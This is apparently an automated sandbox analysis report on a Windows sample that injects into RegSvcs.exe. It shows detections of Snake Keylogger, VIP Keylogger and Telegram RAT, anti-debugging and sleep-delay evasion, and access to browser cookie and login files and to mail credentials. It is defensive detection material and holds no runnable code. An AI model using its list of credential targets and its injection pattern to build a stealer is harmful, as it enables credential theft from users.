Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599232	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599123	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598991	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598888	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598558	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598439	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597434	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1889			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7960			Jump to behavior

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-106816

Source: C:\Users\user\Desktop\3c638k0NJx.exe

API coverage: 5.0 %

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C9445A
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9C6D1 FindFirstFileW,FindClose,	0_2_00C9C6D1
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C9C75C
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C9EF95
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C9F0F2
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C9F3F3
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C937EF
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C93B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C93B12
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C9BCBC

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C349A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599232	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599123	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598991	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598888	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598558	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598439	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597434	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: RegSvcs.exe, 00000001.00000002.3354373950.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!

Source: C:\Users\user\Desktop\3c638k0NJx.exe

API call chain: ExitProcess graph end node

graph_0-104553

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_063C9668 LdrInitializeThunk,

1_2_063C9668

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00CA3F09 BlockInput,

0_2_00CA3F09

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C33B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C33B3A

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C65A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

0_2_00C65A7C

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C34B37 LoadLibraryA,GetProcAddress,

0_2_00C34B37

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00D934F0 mov eax, dword ptr fs:[00000030h]	0_2_00D934F0
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00D93490 mov eax, dword ptr fs:[00000030h]	0_2_00D93490
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00D91E70 mov eax, dword ptr fs:[00000030h]	0_2_00D91E70

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C880A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,

0_2_00C880A9

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C5A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00C5A155
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C5A124 SetUnhandledExceptionFilter,		0_2_00C5A124

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9B3008

Jump to behavior

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C887B1 LogonUserW,

0_2_00C887B1

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C33B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C33B3A

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00C348D7

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C94C53 mouse_event,

0_2_00C94C53

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3c638k0NJx.exe"

Jump to behavior

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C87CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C87CAF

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C8874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C8874B

Source: 3c638k0NJx.exe, 00000000.00000002.885195299.0000000000CE4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 3c638k0NJx.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C5862B cpuid

0_2_00C5862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C64E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C64E87

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C71E06 GetUserNameW,

0_2_00C71E06

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C63F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00C63F3A

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C349A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3c638k0NJx.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6320, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3c638k0NJx.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6320, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: 3c638k0NJx.exe	Binary or memory string: WIN_81
Source: 3c638k0NJx.exe	Binary or memory string: WIN_XP
Source: 3c638k0NJx.exe	Binary or memory string: WIN_XPe
Source: 3c638k0NJx.exe	Binary or memory string: WIN_VISTA
Source: 3c638k0NJx.exe	Binary or memory string: WIN_7
Source: 3c638k0NJx.exe	Binary or memory string: WIN_8
Source: 3c638k0NJx.exe, 00000000.00000002.885195299.0000000000CE4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3c638k0NJx.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6320, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
